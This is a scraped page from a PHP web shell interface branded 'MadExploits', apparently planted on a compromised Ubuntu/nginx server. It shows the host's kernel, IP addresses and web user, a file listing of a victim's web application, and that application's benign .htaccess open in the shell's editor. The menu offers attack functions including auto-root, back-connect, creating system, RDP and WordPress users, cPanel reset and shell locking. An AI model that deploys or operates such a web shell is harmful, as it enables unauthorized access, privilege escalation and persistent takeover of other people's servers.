Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core-ui-code /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
components
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
containers
[ DIR ]
drwxrwxr-x
helpers
[ DIR ]
drwxrwxr-x
images
[ DIR ]
drwxrwxr-x
service
[ DIR ]
drwxrwxr-x
styles
[ DIR ]
drwxrwxr-x
translations
[ DIR ]
drwxrwxr-x
types
[ DIR ]
drwxrwxr-x
ui
[ DIR ]
drwxrwxr-x
utils
[ DIR ]
drwxrwxr-x
.htaccess
1.75
KB
-rwxrwxr-x
.nginx.conf
3.21
KB
-rwxrwxr-x
app.tsx
4.28
KB
-rwxrwxr-x
configureStore.ts
2.21
KB
-rwxrwxr-x
global-styles.ts
658
B
-rwxrwxr-x
globals.d.tsx
214
B
-rwxrwxr-x
i18n.ts
1.26
KB
-rwxrwxr-x
index.html
1.26
KB
-rwxrwxr-x
locales.ts
95
B
-rwxrwxr-x
reducers.ts
9.12
KB
-rwxrwxr-x
saga.tsx
7.17
KB
-rwxrwxr-x
utils.d.ts
74
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
<ifModule mod_rewrite.c> ####################################################################### # GENERAL # ####################################################################### # Make apache follow sym links to files Options +FollowSymLinks # If somebody opens a folder, hide all files from the resulting folder list IndexIgnore */* ####################################################################### # REWRITING # ####################################################################### # Enable rewriting RewriteEngine On # If its not HTTPS RewriteCond %{HTTPS} off # Comment out the RewriteCond above, and uncomment the RewriteCond below if you're using a load balancer (e.g. CloudFlare) for SSL # RewriteCond %{HTTP:X-Forwarded-Proto} !https # Redirect to the same URL with https://, ignoring all further rules if this one is in effect RewriteRule ^(.*) https://%{HTTP_HOST}/$1 [R,L] # If we get to here, it means we are on https:// # If the file with the specified name in the browser doesn't exist RewriteCond %{REQUEST_FILENAME} !-f # and the directory with the specified name in the browser doesn't exist RewriteCond %{REQUEST_FILENAME} !-d # and we are not opening the root already (otherwise we get a redirect loop) RewriteCond %{REQUEST_FILENAME} !\/$ # Rewrite all requests to the root RewriteRule ^(.*) / </ifModule> <IfModule mod_headers.c> # Do not cache sw.js, required for offline-first updates. <FilesMatch "sw\.js$"> Header set Cache-Control "private, no-cache, no-store, proxy-revalidate, no-transform" Header set Pragma "no-cache" </FilesMatch> </IfModule>
Close